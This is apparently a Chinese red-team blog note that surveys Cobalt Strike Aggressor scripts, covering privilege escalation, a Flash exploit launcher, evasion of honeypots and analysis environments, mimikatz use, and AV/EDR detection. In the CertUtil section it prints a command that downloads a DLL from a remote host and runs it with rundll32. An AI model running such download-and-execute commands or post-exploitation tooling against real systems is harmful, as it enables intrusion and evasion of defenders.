郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
Cobalt Strike Aggressor Script
- 1 ProcessTree.cna 与 ProcessColor.cna
- 3 Vincent Yiu 脚本合集
- 4 harleyQu1nn 脚本合集
- 5 bluscreenofjeff 脚本合集
-
- 5.1 beacon_to_empire.cna
- 5.2 beaconestablishednote.cna
- 5.3 beaconid_note.cna
- 5.4 mimikatz-every-30m.cna
- 5.5 mimikatz-timestamp-note-BETA.cna
- 5.6 ping_aliases.cna
- 5.7 powershell.cna
- 5.8 ps-window-alias.cna
- 5.9 silver-tickets.cna
- 5.10 sleep-down-when-no-operators.cna
- 5.11 sleeptimer.cna
- 5.12 beaconpire.cna
- 5.13 CCDC 目录下脚本
- 5.14 OPSEC Profiles 目录下脚本
- 6 ramen0x3f 脚本合集
- 其他人收集的相关脚本
- 7 persistence.cna 持久化脚本
- 8 rasta-mouse 的脚本
- 9 RhinoSecurityLabs:BypassUAC
- 10 Und3rf10w 脚本
- 11 001SPARTaN 脚本合集
- 12 gaudard 红队脚本合集
- 13 其他脚本集合
Aggressor Script是Cobalt Strike 3.0版本以上的一个内置脚本语言,由 Sleep语言解析,Cobalt Strike 3.0以上版本的菜单、选项、事件都由default.cna构建。红队人员可以通过它来调用一些IRC、Webhook接口去对接机器人,实现自动化渗透与监控,Aggressor Script是Cobalt Strike这款C2平台的画龙点睛之笔
1 ProcessTree.cna 与 ProcessColor.cna
-
下载地址:ars3n11/Aggressor-Scripts: Cobalt Strike aggressor scripts (github.com)
-
功能:ps命令展示进程树并上色,作者实际上是修改自 harleyQu1nn 的 ProcessColor.cna,现在两者功能已经完全一致了。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pVcMrFvK-1643118933736)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115214728115.png)]
2 elevate.cna
-
功能:CS作者rsmudge大佬官方出品,增加几种提权方式。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VObsunYs-1643118933737)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221322026.png)]
3 Vincent Yiu 脚本合集
3.1 CVE-2018-4878.cna
-
下载地址:vysecurity/CVE-2018-4878: Aggressor Script to launch IE driveby for CVE-2018-4878 (github.com)
-
功能:VincentYiu写的一键起CVE-2018-4878(Flash漏洞)服务脚本
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kWSsmv8N-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221849618.png)]
3.2 auto-prepenv.cna
- 功能:auto-prepenv.cna 机器上线时自动把explorer.exe设置为ppid,测试时不知道是不是权限原因没有生效。
3.3 Blacklist.cna
- 功能:Blacklist.cna 可以实现设置一个上线机器的黑名单列表,如果机器再次上线会自动退出会话。适用于遇到溯源或者蜜罐以及一些虚拟分析环境。
3.4 mimikatz_addons.cna
- 功能:mimikatz_addons.cna 则是新注册了一个password_change命令,可以实现直接使用mimikatz的密码更改功能强制修改NTLM哈希。
3.5 ping.cna
-
功能:ping.cna 注册一个ping命令,并转换IP地址为HEX的形式去执行该命令。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-scMusCjJ-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117103703753.png)]
3.6 portfwd.cna
- 功能:portfwd.cna 会注册一个portfwd命令,可以实现端口转发。
3.7 vnc-psh.cna
- 功能:
- vnc-psh.cna 是一个把Invoke-Vnc.ps1 注入到内存当中开启VNC服务的脚本,默认端口为5900,密码为SuperMan123。
4 harleyQu1nn 脚本合集
4.1 AVQuery.cna
-
功能:AVQuery.cna 检查杀毒是通过检查注册表键值来判断,同样的可以自行添加自己需要的条目。
AV_Query
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gB5xhUVe-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115222516289.png)]
4.2 ArtifactPayloadGenerator.cna
-
功能:ArtifactPayloadGenerator.cna 生成多种类型的后门文件,生成的结果位于cs目录下的
opt\cobaltstrike
目录下。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S0RCbglK-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115223543134.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6VYKCPCD-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115224705490.png)]
4.3 CertUtilWebDelivery.cna
-
功能:类似使用CertUtil下载文件
-
命令执行:
powerpick certutil.exe -urlcache -split -f http://192.168.0.2:280/dll.txt Adobedll.dll; rundll32.exe Adobedll.dll,StartW powerpick:不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌( token )。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v7UBu6uW-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115232659018.png)]
CertUtil下载文件参考:certutil在传输payload中的新奇技巧 - admin-神风 - 博客园 (cnblogs.com)
4.4 EDR.cna
-
功能:EDR.cna使用检测驱动的方式来检测是否存在终端安全产品。相对于主流杀毒软件,EDR 终端安全产品主要用来反APT类的持久化攻击,所以较之常规杀毒更为难缠。
# edr_query [hostname] [arch] edr_query localhost x64 # localhost 表示为本地主机
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q3Y4fvbx-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233447511.png)]
4.5 logvis.cna
-
功能:logvis.cna 实现了beacon command log的可视化。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UVzeGRZr-1643118933741)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233706638.png)]
4.6 ProcessMonitor.cna
-
功能:ProcessMonitor.cna 可以实现指定时间段内对于程序运行情况的监控。
ProcessMonitor Start 1m
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0Zjq